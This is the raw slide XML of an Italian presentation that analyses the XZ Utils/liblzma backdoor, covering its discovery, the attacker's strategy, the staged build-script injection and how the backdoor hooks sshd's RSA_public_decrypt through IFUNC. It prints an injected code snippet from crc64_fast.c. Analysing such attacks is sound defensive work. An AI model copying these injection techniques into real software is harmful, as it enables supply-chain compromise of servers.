                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nella 5.6.1 c'è inoltre un meccanismo dell'estensione per permettere di continuare lo sviluppo attraverso l'aggiunta di nuovi file di test in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/test/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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Riga 20 e riga 23 controllano IFUNC abilitata sul sistema obiettivo, altrimenti exit;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Riga 29 verifica supporto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> libraries mentre verifica x86_64 fino a riga 41;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...verifica che sia tutto pronto per l'installazione della backdoor...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302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73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6415"/>
            <a:ext cx="11853204" cy="4955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Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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Riga 106 applica le modifiche a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Le nuove righe aggiunte sono anch'esse offuscate ed inserite in ordine sparso, lontane tra loro;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Riga 113 testa il segnale che creerà una catena di eventi (che coinvolgono la funzionalità IFUNC  ed il segnale LD_BIND_NOW) che consente alla backdoor, in fase di startup del servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, di inserire nella tabella di risoluzione dei simboli del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> linker la propria versione del simbolo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" i="1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Riga 174 viene creata liblzma_la-crc64-fast.o, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contenente la backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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it-IT" sz="2400" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic N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24317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74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6415"/>
            <a:ext cx="11853204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Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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liblzma_la-crc64-fast.o viene usato per sovrascrivere l'oggetto associato a crc64_fast.c.</a:t>
            </a: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In modo analogo, liblzma_la-crc32-fast.o viene usato per sovrascrivere l'oggetto associato a crc32_fast.c.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Durante l'iniezione, vengono definite le funzioni della backdoor che sostituiranno quelle reali, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>get_cpuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che sostituirà </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>get_cpuid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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nel codice di XZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" i="1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Viene in particolare definito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crc64_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, la funzione che consentirà alla backdoor, durante la fase di startup di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, di agganciarsi a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> come descritto a riga 113.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6948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La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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75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6415"/>
            <a:ext cx="1185320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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Recap</a:t>
            </a:r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 installazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9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49A7012E-D8CA-BE58-2A6A-DC9C39C9A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662" y="2391336"/>
            <a:ext cx="5853472" cy="429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44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12832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 sommario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76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2A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="863413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Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRP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La scoperta di Andres Freund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La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a: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 Tan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b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor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Forme di mitigazione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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41438945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77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26415"/>
            <a:ext cx="3276058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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Snippet</a:t>
            </a:r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 iniezione </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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in crc64_fast.c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Sono evidenziate le funzioni nuove introdotte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lo scopo è l'installazione di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audit hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La backdoor "si pone in ascolto" per eventuali connessioni.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384C0AA-7538-0FC0-8C70-EEE4217BF247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603579" y="1605447"/>
            <a:ext cx="8023411" cy="53399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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># 0 "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path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/to/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src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/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liblzma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/check/crc64_fast.c"
...
#if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defined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(CRC_X86_CLMUL)
#  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define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BUILDING_CRC64_CLMUL
#   include "crc_x86_clmul.h"
#endif
#if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defined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(CRC32_GENERIC) &amp;&amp;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defined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(CRC64_GENERIC) &amp;&amp; \
   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defined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(CRC_X86_CLMUL) &amp;&amp;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defined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(CRC_USE_IFUNC) &amp;&amp;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defined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(PIC) &amp;&amp; \
    (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defined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(BUILDING_CRC64_CLMUL) ||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defined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(BUILDING_CRC32_CLMUL))
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extern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int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it-IT" sz="1100" dirty="0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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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get_cpuid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int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void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*,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void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*,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void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*,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void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*,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void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*);
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static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inline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bool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it-IT" sz="1100" dirty="0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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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is_arch_extension_supported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void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) {
   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int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success = 1;
    uint32_t r[4];
    success = _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get_cpuid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(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((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char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*) __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builtin_frame_address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(0))-16);
   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const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uint32_t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ecx_mask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= (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19);
   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return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success &amp;&amp; (r[2] &amp;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ecx_mask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) ==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ecx_mask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;
}
#else
#define _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is_arch_extension_supported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is_arch_extension_supported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
#endif
...
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static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crc64_func_type
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0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crc64_resolve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void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)
{
    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return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 _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>is_arch_extension_supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>()
            ? &amp;crc64_arch_optimized : &amp;crc64_generic;
}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26002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78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Audit hook su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="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D64BE8AD-EB14-4EBD-B321-846562A4B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559" y="2470879"/>
            <a:ext cx="7014882" cy="41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814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79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Setup del gancio su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1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it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attivazione del servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: risolve le dipendenze, carica la libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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F0BFECA-4F28-0808-33AF-50CE4F0209EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146958" y="3891642"/>
            <a:ext cx="1134835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2.   Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> linker deve caricare i simboli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, quindi li cerca:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Segnale LD_BIND_NOW causa la risoluzione dei simboli IFUNC per primi;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Viene richiamata crc64_resolve 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(backdoor)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cs typeface="Arial"/>
              </a:rPr>
              <a:t> tra i simboli IFUNC;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod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La backdoor riesce ad agganciare il processo del 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dynamic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 linker, inserendo la sua versione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i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tra i simboli che il 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dynamic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 linker deve caricare.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next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276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Introduzione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85289" y="1981907"/>
            <a:ext cx="1211518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The Linux Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="32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Organizzazione non-profit che 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fornisce un hub neutrale e affidabile per sviluppatori e organizzazioni per codificare, gestire e scalare progetti ed ecosistemi di tecnologia aperta.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="240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BACC1C0D-D4C8-DD70-2607-7B6B73CD7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425692"/>
            <a:ext cx="6096000" cy="227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467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80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Funzionamento del gancio su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1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3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ora risolverà il simbolo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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con una funzione interna al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programma backdoor, il quale rimane in attesa;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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4.   Quando un pacchetto raggiunge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> viene richiesta l'autenticazione chiamando</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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per verificare se la chiave privata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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>priv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si risolve con una chiave pubblica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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25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nel sistema. Il pacchetto con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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-250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viene dato in input alla backdoor:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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Verifica caratteristiche del pacchetto;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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La backdoor stessa chiama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>libcrypto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per risolvere l'autenticazione;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>priv,Jia</a:t>
            </a:r>
